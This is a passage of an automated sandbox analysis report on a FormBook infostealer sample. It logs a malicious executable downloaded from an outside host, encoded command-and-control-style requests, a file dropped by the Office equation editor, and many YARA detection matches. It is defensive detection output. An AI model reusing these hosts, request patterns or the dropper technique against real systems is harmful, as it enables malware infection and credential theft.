          Source: explorer.exe, 00000006.00000000.450689751.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.514669026.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432749870.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443479778.000000000449C000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp
          Source: explorer.exe, 00000006.00000000.450689751.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.514669026.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432749870.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443479778.000000000449C000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp0
          Source: explorer.exe, 00000006.00000000.450689751.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.514669026.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432749870.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443479778.000000000449C000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
          Source: explorer.exe, 00000006.00000000.450689751.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.514669026.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432749870.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443479778.000000000449C000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-de/?ocid=iehpC
          Source: explorer.exe, 00000006.00000000.441136797.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000006.00000000.450661443.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.438489061.000000000845A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443564000.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.446213289.0000000008426000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432704474.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.450764826.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432948850.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.515608032.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.438411780.00000000083C9000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443456223.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.452882159.00000000083C9000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000006.00000000.450661443.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.438489061.000000000845A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.446213289.0000000008426000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432704474.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.515608032.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.438411780.00000000083C9000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443456223.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.452882159.00000000083C9000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000006.00000000.441136797.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000006.00000000.442612766.0000000003DF8000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
          Source: explorer.exe, 00000006.00000000.452882159.00000000083C9000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
          Source: explorer.exe, 00000006.00000000.451072374.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.516156334.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443806201.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.433262826.00000000045D6000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM
          Source: explorer.exe, 00000006.00000000.427421343.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.447366973.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.439424589.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.511482997.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://support.mozilla.org
          Source: explorer.exe, 00000006.00000000.427421343.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.447366973.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.439424589.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.511482997.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org
          Source: explorer.exe, 00000006.00000000.427421343.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.447366973.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.439424589.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.511482997.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1301DF5A-9B1F-4290-90EE-2E8BF9838615}.tmpJump to behavior
          Source: unknownDNS traffic detected: queries for: dell-tv.tk
          Source: global trafficHTTP traffic detected: GET /ashlyzx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: dell-tv.tkConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /op9t/?0l=exlpTNNXh0F&c0=4uZm8lPh56XAYP0u1p0c6SVxcutgTZuNbzhe7MVeNR3LwnMhhkFBXHHvU8jy6jgZH7Gcyg== HTTP/1.1Host: www.texaszephyr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /op9t/?c0=RQ8pabDbnEWS4MHppDnLpAnnVm0R7EKmWqTB7JHuP07woLOWNs0JhuHKNBpScYVLrEmjjw==&0l=exlpTNNXh0F HTTP/1.1Host: www.publicfigure.skinConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /op9t/?0l=exlpTNNXh0F&c0=WMWbw9/24XbwIiPl+aU7TY/mYt55hlmFa8WJlEktQGdJQVklk58s/CKKr8Th7+7tz7UKpw== HTTP/1.1Host: www.volunteervabetweenk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match | File source: 5.0.ashlkyvc7592.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.ashlkyvc7592.exe.400000.10.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.ashlkyvc7592.exe.33ebb40.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.ashlkyvc7592.exe.3393520.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.ashlkyvc7592.exe.400000.10.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.ashlkyvc7592.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.ashlkyvc7592.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.ashlkyvc7592.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.ashlkyvc7592.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.453524985.0000000009369000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.423949680.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.461715282.0000000000360000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.423661966.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.446630168.0000000009369000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.461694176.0000000000310000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.425827877.0000000003249000.00000004.00000001.sdmp, type: MEMORY

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 5.0.ashlkyvc7592.exe.400000.8.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.ashlkyvc7592.exe.400000.8.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.ashlkyvc7592.exe.400000.10.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.ashlkyvc7592.exe.400000.10.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.ashlkyvc7592.exe.33ebb40.3.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.ashlkyvc7592.exe.33ebb40.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.ashlkyvc7592.exe.3393520.2.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.ashlkyvc7592.exe.3393520.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.ashlkyvc7592.exe.400000.10.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.ashlkyvc7592.exe.400000.10.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.ashlkyvc7592.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.ashlkyvc7592.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.ashlkyvc7592.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.ashlkyvc7592.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.ashlkyvc7592.exe.400000.2.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.ashlkyvc7592.exe.400000.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.ashlkyvc7592.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.ashlkyvc7592.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.453524985.0000000009369000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.453524985.0000000009369000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.423949680.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.423949680.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.461715282.0000000000360000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.461715282.0000000000360000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.423661966.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.423661966.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.446630168.0000000009369000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.446630168.0000000009369000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.461694176.0000000000310000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.461694176.0000000000310000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.425827877.0000000003249000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.425827877.0000000003249000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ashlyzx[1].exe
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: 5.0.ashlkyvc7592.exe.400000.8.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.ashlkyvc7592.exe.400000.8.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.ashlkyvc7592.exe.400000.10.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.ashlkyvc7592.exe.400000.10.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.ashlkyvc7592.exe.33ebb40.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.ashlkyvc7592.exe.33ebb40.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.ashlkyvc7592.exe.3393520.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.ashlkyvc7592.exe.3393520.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.ashlkyvc7592.exe.400000.10.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.ashlkyvc7592.exe.400000.10.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.ashlkyvc7592.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.ashlkyvc7592.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.ashlkyvc7592.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.ashlkyvc7592.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.ashlkyvc7592.exe.400000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.ashlkyvc7592.exe.400000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.ashlkyvc7592.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.ashlkyvc7592.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.453524985.0000000009369000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.453524985.0000000009369000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.423949680.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.423949680.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.461715282.0000000000360000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.461715282.0000000000360000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.423661966.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.423661966.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.446630168.0000000009369000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.446630168.0000000009369000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.461694176.0000000000310000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.461694176.0000000000310000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
